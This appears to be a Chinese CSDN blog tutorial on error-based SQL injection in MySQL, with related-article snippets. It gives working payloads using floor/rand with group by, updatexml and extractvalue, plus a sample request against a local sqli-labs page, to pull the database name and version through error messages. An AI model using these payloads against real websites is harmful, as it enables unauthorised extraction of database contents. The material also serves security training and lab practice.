SQL注入之报错型注入

最新推荐文章于 2024-06-06 19:11:19 发布

selecthch

最新推荐文章于 2024-06-06 19:11:19 发布

阅读量5.7k

点赞数 2

分类专栏： sql注入

本文链接：https://blog.csdn.net/weixin_42277564/article/details/80635586

版权

sql注入专栏收录该内容

8 篇文章 7 订阅

订阅专栏

报错注入的前提：

页面上没有显示位但是有sql语句执行错误信息输出。

mysql_error()函数

作用：返回上一个Mysql操作产生的文本错误信息

如：

在用php对mysql进行一些增删改查操作的时候，如果数据库在执行的过程中遇到错误，此时数据库是有错误回显的，但是这个错误回显不会显示在Web应用页面中的。

如下是php脚本错误信息

需要php.ini 中display_errors=On开启PHP错误回显。

1、通过floor报错

and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)

注：输出字符长度限制为64个字符payload填sql语句
如查询当前数据库
http://127.0.0.1/sql/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
2、通过updatexml报错

and updatexml(1,payload,1)
and updatexml(1,concat(0x7e,@@version,0x7e),1)

注：输出字符有长度限制，最长32位

如下图

3、通过ExtractValue报错

and extractvalue(1, payload)
and extractvalue(1, concat(0x7e,@@version,0x7e))

注：输出字符有长度限制，最长32位

payload可以按照上一篇联合查询注入博客中的写，都是一样的

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

selecthch

关注关注

2
点赞
踩
8

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

SQL注入之报错注入

m0_56578216的博客

08-23

1180

table_name=0x636d735f7573657273是cms_users表名转16进制后的结果，如果直接用表名’cms_users’，会导致表名被cms**转义并报错，**所以需要避免单引号的使用。在注入点的判断过程中，发现数据库中SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。limit 0，1：用来限定取第0行的一行记录，由于有8个表，也就是有8行数据，多取会报错。limit 1，1：用来限定取第1行的一行记录，由于有3行数据，多取会报错。

《网络安全自学教程》- SQL注入之报错注入原理+步骤+实战操作

wangyuxiang946的博客

03-07

5123

这篇文章为大家解析报错注入的实现原理，结合实战案例讲解报错注入的使用步骤。

1 条评论您还未登录，请先登录后发表或查看评论

报错SQL注入

SheXinK’s Blog

12-17

388

报错SQL注入1、 SQL注入介绍2、 POST注入PHP代码3、 POST注入测试4、 SQL注入防御 1、 SQL注入介绍 SQL注入介绍：SQL注入介绍注入产生原因：web应用程序对用户输入数据的合法性没有判断或过滤不严，导致恶意payload直接带入SQL语句执行，从而执行payload中非法操作！ 2、 POST注入PHP代码新建PHP文件，将下面代码复制到PHP文件中，...

SQL报错型注入

weixin_44029504的博客

04-16

364

报错型SQL注入 -------------------------------------------------我是小小分隔符---------------------------------------------- 基本原理：报错型sql注入与SQL联合注入的前三步是一致的（上篇博客），但没有数据的回显位，也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则...

报错型SQL注入

heibaikong6的博客

09-08

428

简介报错型SQL注入和SQL注入案例注入的前三步是一致的，但是没有数据的回显位，也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上，我们可以利用这点来构造报错显示SQL语句。下面是利用count(*),floor(rand(0)*2),group by 报错。方法将两种函数结合应发一些错误，但其中加杂对所需要信息的查询步骤依旧进行试验...

SQL注入之报错型盲注详解

DM766924的博客

09-15

1820

报错显示的原理：前提：MYSQL报错信息必须能够在页面回显。原理：通过MYSQL一些函数的限制条件让其报错，产生超出预期的结果，且报错信息中包含重要信息。要求：需要能够知道MYSQL中哪些函数有限制条件，利用限制条件进行报错，需要了解函数原理才知道熟悉运用。分类：基于group by报错注入基于xpath函数报错注入(5.1.1及以上，extractvalue和updatexml) 基于double数值类型超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入基于数据重复性报错注入报

SQL注入之报错型注入法（基于Metasploitable2-Linux）

qq_43578780的博客

11-29

424

1、使用报错型注入的条件 1）：在数据查询时，网页没有查询输出的结果；但当输入错误时，网页上有输入错误的提示（其实就是在信息与数据库进行交互后，输入错误的信息时，网页会显示出来。） 2）：其在网页上的具体情况，和解决的办法。由于在输入正确时，其显示的结果不变。故只能尝试在输入错误时，其显示会进行提示这一点进行交互。方法：在输入正确时，没有数据的显示，也就是说即使构造语句成功我们也没有办法...

33-33.渗透测试渗透测试之SQL注入基于报错注入(下)

05-10

渗透测试渗透测试之SQL注入基于报错注入(下)

【SQL注入】报错型注入

noob_3000的博客

08-11

572

【SQL注入报错型】CTFHUB学习记录

SQL注入——报错型注入

qq_41554179的博客

03-12

591

报错型sql注入 报错型sql注入上述sql注入的前三步是一致的，但没有数据的回显位，也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上，我们可以利用这点来构造报错显示sql语句。下边是利用count（*）， FLOOR(RAND(0)*2，group by报错。语句： - AND(SELECT 1 FROM (SELECT COUNT(*...

sql注入（报错注入）

2302_79119987的博客

04-19

1533

实行注入的地方。

SQL注入2（报错型注入）

嚴帅的博客

04-25

782

接SQL注入（一）https://blog.csdn.net/weixin_43997530/article/details/105627979 报错型SQL注入 我们先介绍一下报错型SQL注入，报错型sql注入sql注入（一）的前三步是一致的，但没有数据的回显位，也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上，我们可以利用这点来构造报错显示...

sql 报错注入

travelnight的博客

03-15

4116

以往个人知识星球搬运 by travelnight 这里以sql-libs为例。一、基础报错注入这里的东西比较简单，快速略过。访问：http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错直接闭合‘ 标签发现正常，说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...

sql注入之报错注入

weixin_47075747的博客

02-28

5503

报错注入常用的报错注入就两种：extractvalue ， updatexml 什么时候使用报错注入呢？当没有一个合适的数据返回点的时候就需要报错注入。注入的时候后端是被注入了的，但是前端没有得到更好的显示。 extractvalue payload: and extractvalue(null,concat(0x7e,(payload),0x7e)) 对数据库进行 xml 文档的故意报错利用 concat 在后台进行拼接指定第一个参数为 null ，让他故意报错，讲第二个参数种的语句带入

Sql注入-报错注入